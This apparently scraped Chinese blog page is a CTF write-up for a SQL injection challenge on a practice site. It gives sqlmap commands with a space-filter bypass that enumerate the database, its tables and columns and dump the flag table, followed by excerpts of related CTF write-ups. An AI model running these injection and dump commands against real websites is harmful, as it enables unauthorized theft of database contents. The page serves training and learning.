1. 程式人生 > >實驗吧 ctf 題目簡單的sql注入2writeup

實驗吧 ctf 題目簡單的sql注入2writeup

1.輸入id值,通過回顯發現題目應該是進行了空格過濾

2.使用sqlmap進行注入

   2.1  python sqlmap.py  -u "http://ctf5.shiyanbar.com/web/index_2.php?id=1" --random-agent  --tamper=space2hash.py 

         --current-db   檢視當前資料庫名稱,返回web1


       --current-db --tables 檢視當前資料庫名稱和資料庫裡所有的表

看到web1裡有個flag表,看來key就在裡面

 2.3  python sqlmap.py  -u "http://ctf5.shiyanbar.com/web/index_2.php?id=1" --random-agent  --tamper=space2hash.py

     --current-db --tables --columns  看到flag表裡面有個flag列

                                  2.4  python sqlmap.py -u "http://ctf5.shiyanbar.com/web/index_2.php?id=1" --random-agent  --tamper=space2hash.py --current-db --tables --columns flag --dump


相關推薦

實驗 ctf 題目簡單sql注入2writeup

1.輸入id值,通過回顯發現題目應該是進行了空格過濾 2.使用sqlmap進行注入    2.1  python sqlmap.py  -u "http://ctf5.shiyanbar.com/web/index_2.php?id=1" --random-agent 

實驗CTF題目之疑惑的漢字(1876)

對於這種題,唯一的方法就是積累;見得多了也就不覺得奇怪了; 題目給出了密文,分析密文發現這些漢字沒有什麼特殊的含義;那就從他的結構來分析;你會發現他們特別符合當鋪密碼的結構; 什麼是當鋪密碼?當鋪密

實驗CTF題目之抓到你了(代號:1813)

開啟解題連結,他需要你下載一個檔案,下載完成後你會發現是一個pcap為字尾的檔案,果斷用wireshark開啟進行資料分析; 題目中有給的提示:入侵者是通過ping工具進行掃描的。而ping命令使用的是ICMP協議,所以在過濾器中填寫icmp; 有5個數據包,分別檢視他

實驗 ctf 簡單sql注入3

解題連結: http://ctf5.shiyanbar.com/web/index_3.php id=1為注入點 http://ctf5.shiyanbar.com/web/index_3.php?id=1然後就用sqlmap來跑一下 結果能出答案 我也是抱著嘗試的態度

實驗Web-中-簡單sql注入之2

輸入union select、order by這些關鍵字會提示SQLi detected! 說明對於關鍵字有防護 輸入1 union也會提示SQLi detected! 但是如果去掉空格:1union,則會返回正常,1'and'1'='1(無空格)也返回正常 所以可能是過濾了空格。

實驗web-中-簡單sql注入

頁面顯示:到底過濾了什麼東西? 所以我們先試試到底是過濾了什麼 1 顯示正常 1' 不正常 (直接輸入的關鍵字均會被過濾) 1 union select 顯示:1 select 1 union select table_name 顯示:1 table_name 1 unionuni

實驗-CTF-web-忘記密碼了&&這個看起來有點簡單 (學習筆記)

實驗環境 firefox BurpsuitePro-v1.6 sqlmap(kali) 忘記密碼了 題目為一個連結 開啟是一個輸入郵箱接收重置密碼的網頁,檢視原始碼發現管理員郵箱,vim格式,可能會有一個備份檔案.swp,還有一個重置密碼連結 構造一下url,改為http

實驗ctf題庫:這個看起來有點簡單

       這是一道十分基礎的web題目,因為我也是剛剛接觸ctf,記錄一下第一道題的解題過程,算是自己的一個回顧吧,同時也給一些想要入門的朋友一點點微弱的參考吧。一、sqlmap的安裝       在windows下安裝sqlmap需要先下載適用windows的sqlma

實驗-CTF-web-忘記密碼了&&這個看起來有點簡單 (學習筆記)

實驗環境 firefox BurpsuitePro-v1.6 sqlmap(kali) 忘記密碼了 題目為一個連結 開啟是一個輸入郵箱接收重置密碼的網頁,檢視原始碼發現管理員郵箱,vim格式,可能會有一個備份檔案.swp,還有一個重置密碼連結 構造一下url

實驗CTF逆向題目easycreakme題解

在實驗吧看到這道題 題目連結 我是直接用的脫殼後的 IDA載入很清楚的可以發現先後與a,5y,R3versing,E進行比較 若都符合 輸出congratulation!! 那麼我們的flag就是Ea5yR3versing 最後記得加上ctf{}再

實驗ctf-web題:這個看起來有點簡單

從今天開始做實驗吧的CTF習題,爭取一天一道,一天一總結,做到不貪多,不糊弄,每天學習一點點,每天進步一點點。 今天做的是這個看起來有點簡單這個題,是一道SQL注入的題目。用了兩種方法,一種就是從url進行sql注入,一種是使用sqlmap工具。 預

實驗CTF題庫-隱寫術

打不開 nba car src lag 下載圖片 div key 查看 Spamcarver: 用kali下載圖片 root@sch01ar:~# wget http://ctf5.shiyanbar.com/stega/spamcarver/spamcarver.jpg

實驗CTF who are you?基於時間盲註

請求 .get head 輸入 pytho 知識 request quest lee 這是我第三次接觸時間盲註,所以就寫一個博文和大家分享一下,還能檢驗我對知識的掌握程度。?( ′???` ) 點開網址是把你的真實IP地址打印出來!然後立馬看網頁源代碼什麽發現都沒有! 現

實驗-CTF-web-頭有點大&&貌似有點難&&看起來有點難(學習筆記)

實驗環境 sqlmap(kali2.0) BurpsuitePro-v1.6 firefox 頭有點大 題目連結:http://www.shiyanbar.com/ctf/29 打開發現說缺少 .net framework9.9,但是沒有9.9版本,還要求在英格蘭地區

CTF練習平臺sql注入測試writeup

練習網址http://103.238.227.13:10083/ 頁面截圖 由以上提示我們可以看出查詢key表,id=1的string欄位,為此我們可以從最基本的注入開始嘗試 發現並不報錯,想到了寬位元組注入,並且可以驗證一下: http://103.238.227.1

實驗CTF題庫 bin100(ebCTF 2013) 利用OD進行逆向破解

分析: 首先我們執行開啟的程式,發現是一個按回車鍵然後生成一個骰子個數的遊戲,試驗了兩下,發現可能要很多步才能得出最終答案,所以需要我們對這個程式破解然後跳過這個驗證環節。 1.使用PEID載入分析

實驗CTF天網管理系統

天網你敢來挑戰嘛 格式:ctf{ } 解題連結: http://ctf5.shiyanbar.com/10/web1/  開啟連結後,嗯,光明正大的放出賬號密碼,肯定是登不進的,檢視原始碼 看來是和md5碰撞有關的了, PHP在處理雜湊字串時,會利用”!=”或”

西普實驗CTF-分數拆分

題目描述: 存在這樣的一個等式,1/400=1/x+1/2y,(x>y)。你的任務就是求出共有多少對這樣的正整數x和y,使得該等式成立。(提示:你只需要求出有多少對,而不必輸出這些X,Y對具體是

實驗CTF刷題記錄(web篇)

5.程式邏輯問題 繞過 if($_POST[user] && $_POST[pass]) { $conn = mysql_connect("********, "*****", "********"); mysql_select_db("phpformysql") or die

實驗ctf

1/登陸一下好嗎?? http://ctf5.shiyanbar.com/web/wonderkun/web/index.html =' =' ctf{51d1bf8fb65a8c2406513ee8f52283e7} import r